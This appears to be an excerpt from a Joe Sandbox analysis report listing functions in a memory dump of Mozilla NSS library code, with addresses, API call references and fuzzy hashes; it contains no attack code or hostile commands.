Opcode Fuzzy Hash: 5384328983dbd372d2e7bc177d4029337e81ae8ee7a9bf7b7e2dac66c09b8a63
Instruction Fuzzy Hash: 0041B1B0B412018FDB50DFA9CC8479A7BE4AF48318F11416EDC19DBB46E774D885CB96

Function 6C613FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C613FF2

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaMark_Util.NSS3(?), ref: 6C614001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C61400F

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C614054

Part of subcall function 6C5ABB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C5ABC24
Part of subcall function 6C5ABB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5ABC39
Part of subcall function 6C5ABB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C5ABC58
Part of subcall function 6C5ABB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C5ABCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C614070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C6140CD

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 0b4d19bd88e8dcae8593dcaf0a842cddf2e68408bb5c27bc666ef3183d602af7
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 10312B71E043459BEB008F699D81BBB3364AF9170DF144224FD09ABB42F772E9988299

Function 6C5B2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C5A2D1A), ref: 6C5B2E7E

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

PR_Now.NSS3 ref: 6C5B2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C5B2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C5A2D1A), ref: 6C5B2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C5A2D1A), ref: 6C5B2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C5B2F81

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: a863f1c7af0060fabae269d793bbd443a84b90464c0a487bada85af33cefef4e
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 9031287150110087F714C656CCAABBF76A5EF81318F644A79D42DB7ED0EB319846CA31

Function 6C5A0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C5A0A2C), ref: 6C5A0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C5A0A2C), ref: 6C5A0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C5A0A2C), ref: 6C5A0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C5A0A2C), ref: 6C5A0E90
free.MOZGLUE(00000000), ref: 6C5A0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C5A0A2C), ref: 6C5A0ED9

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 15bbf20bb7e1d2aa333bd883b9b15741df13e3f5a58930ce797d1d46b37b2f64
Instruction ID: bbc7685c7d174cce26868485422da837b8ae7344d7cf7968e57ba096cbec1920
Opcode Fuzzy Hash: 15bbf20bb7e1d2aa333bd883b9b15741df13e3f5a58930ce797d1d46b37b2f64
Instruction Fuzzy Hash: 8C213172F102845BEB1086E75C45B6F76AEDBC1748F150437D91B63B01EA61D81792B1

Function 6C5AAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5AAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C5AAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C5AAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C6C9500), ref: 6C5AAF23

Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5FF0C8
Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5FF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AAF37

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 12c8e10017bee5c831bb8896b31c7905faa4a5777c77b67d6f3a0dffd8d6c823
Instruction ID: fba4b8480bca4fa3f77cb2bb92c6a1a56194af8f56db3c857b447f3cc2331fdd
Opcode Fuzzy Hash: 12c8e10017bee5c831bb8896b31c7905faa4a5777c77b67d6f3a0dffd8d6c823
Instruction Fuzzy Hash: A7213C75509200ABE7108E599C41B5E7BE4AFC572CF144314FC649B781E731D5068BAB

Function 6C62EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C62EE85
realloc.MOZGLUE(CDC03278,?), ref: 6C62EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C62EEC5

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

htonl.WSOCK32(?), ref: 6C62EEE3
htonl.WSOCK32(00000000,?), ref: 6C62EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C62EF01

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: b8b7625b52b450ac689568ce29466bafa23d9e773666896fc9ecf9ecf29d133c
Instruction ID: ff4b0e532f06f8f7d9577cc66dad238a1c0574009543d48c1b7203539976091a
Opcode Fuzzy Hash: b8b7625b52b450ac689568ce29466bafa23d9e773666896fc9ecf9ecf29d133c
Instruction Fuzzy Hash: 8A21D371A002149FCB109F38DC8079A7BA8EF49359F148179EC59AB651E335EC15CBEA

Function 6C5DEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5DEE49

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5DEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C5DEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C5DEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5DEEB3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 633a20da0557a211713dc698643ff6628f666a897f1eb1a9d2fa1e8a994e6262
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 5821C3B6A00311ABEB118B58DC81EABB7A8EB45708F050164FE14DB741E7B1EC15C7F1

Function 6C5A7F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5A7F68

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C5A7F7B

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A7FA7

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6C919C,?), ref: 6C5A7FBB

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5A7FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C6C915C,00000014), ref: 6C5A7FFE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: 8794048bdab71f77e3d351cc455fef09ffaa61775cd2fa6bf5466fc4e4709716
Instruction ID: ae1d9ef5f7040048ae42f8df34c4c8674dfbe384676c836fe89a9337a6d9d487
Opcode Fuzzy Hash: 8794048bdab71f77e3d351cc455fef09ffaa61775cd2fa6bf5466fc4e4709716
Instruction Fuzzy Hash: B9113A71E0020497F7149A669D41BBB77FCDF4968CF00062DFC69D2B42F720AA49C6BA

Function 6C5ABE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6C62DC29,?), ref: 6C5ABE64

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C62DC29,?), ref: 6C5ABE78

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C62DC29,?), ref: 6C5ABE96

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C62DC29,?), ref: 6C5ABEBB

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6C62DC29,?), ref: 6C5ABEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C62DC29,?), ref: 6C5ABEF3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: a610a2f885dbf6b078156250c5b9befafe6eba77ee912bbf833f40154035b8c9
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: 7A11B771F002099BEB049BA59D41FAF3BA8EF41258F144428ED09EB781EB31D91AC7F5

Function 6C633C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C633D3F

Part of subcall function 6C5ABA90: PORT_NewArena_Util.NSS3(00000800,6C633CAF,?), ref: 6C5ABABF
Part of subcall function 6C5ABA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C633CAF,?), ref: 6C5ABAD5
Part of subcall function 6C5ABA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C633CAF,?), ref: 6C5ABB08
Part of subcall function 6C5ABA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C633CAF,?), ref: 6C5ABB1A
Part of subcall function 6C5ABA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C633CAF,?), ref: 6C5ABB3B

PR_EnterMonitor.NSS3(?), ref: 6C633CCB

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

PR_EnterMonitor.NSS3(?), ref: 6C633CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C633CF8
PR_ExitMonitor.NSS3(?), ref: 6C633D15
PR_ExitMonitor.NSS3(?), ref: 6C633D2E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: 2e60b07794fc639a95635cfcac38f504d2e4efc66620fa0ab2863675664e4d33
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 981108B56106106FE7215F66FC4279BB2E4EF5230CF507538E80E87B20E632E81AC65E

Function 6C5FFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5FFE08

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5FFE1D

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5FFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5FFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5FFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C5FFE6F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 41b76b8e47752896a26b99c0cd1980a5c7088e5f29d56c418c69e9b2bf97bab4
Instruction ID: 6f2d0ab1e1e61758232bc4d40ac77f4a37fe799529e176f9e69619a1d5678683
Opcode Fuzzy Hash: 41b76b8e47752896a26b99c0cd1980a5c7088e5f29d56c418c69e9b2bf97bab4
Instruction Fuzzy Hash: 591125B7A00201ABEB048F54DC40A5B77D8AF15299F108634EA3997F12E731E915CBA9

Function 6C6AFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C6AFD9E

Part of subcall function 6C669BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C591A48), ref: 6C669BB3
Part of subcall function 6C669BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C591A48), ref: 6C669BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C6AFDB9

Part of subcall function 6C58A900: TlsGetValue.KERNEL32(00000000,?,6C7014E4,?,6C524DD9), ref: 6C58A90F
Part of subcall function 6C58A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C58A94F

PR_Unlock.NSS3 ref: 6C6AFDD4
PR_Lock.NSS3 ref: 6C6AFDF2
PR_NotifyAllCondVar.NSS3 ref: 6C6AFE0D
PR_Unlock.NSS3 ref: 6C6AFE23

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
